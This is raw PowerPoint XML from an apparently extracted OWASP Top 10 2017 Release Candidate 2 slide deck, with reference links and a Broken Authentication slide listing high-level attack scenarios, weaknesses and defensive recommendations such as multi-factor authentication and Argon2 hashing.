TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET"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OWASP/Top10/issues" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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19.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2.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20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><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3.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notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2010" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007" TargetMode="Externa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hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="Externa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hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions"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slide" Target="slide4.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"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www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator" TargetMode="External"/><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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html"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www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Command_Injection_Defense_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/knowledgebase/issues/details/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injec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WASP-01.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4824012"/>
            <a:ext cx="4876800" cy="3249168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6858000" cy="42672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304800" y="3201130"/>
            <a:ext cx="4170316" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>Candidate 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>omments requested per</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t> i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>nstructions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>within</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWASP_logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large.png">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="8501004"/>
            <a:ext cx="1081144" cy="257976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="5105400" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>OWASP Top 10 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Ten Most Critical Web Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="8768565"/>
            <a:ext cx="4876800" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>This work is licensed under a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Creative Commons Attribution-ShareAlike 4.0 International License</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="8758980"/>
            <a:ext cx="4876800" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>https://owasp.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212467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Example Attack Scenarios</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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="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4"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, is a common attack. If an application does not rate limit authentication attempts, the application can be used as a password oracle to determine if the credentials are valid.</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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Insecure password storage (including plain text, reversibly encrypted passwords, and weakly hashed passwords (such as using MD5/SHA1 with or without a salt)) can lead to breaches. A recent effort by a small group of researchers cracked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>320 million passwords in less than three weeks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, including long passwords. Instead use modern hashing algorithms such as Argon2, with salting and sufficient work factor to prevent the use of rainbow tables, word lists, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Confirmation of the user's identity, authentication, and session management are critical for separating malicious unauthenticated attackers from authorized users.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You may have authentication weaknesses if your application:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, which is where the attacker has a list of valid usernames and passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permits brute force or other automated attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permits default, weak or well-known passwords, such as "Password1" or "admin/admin“.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Uses weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Uses plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
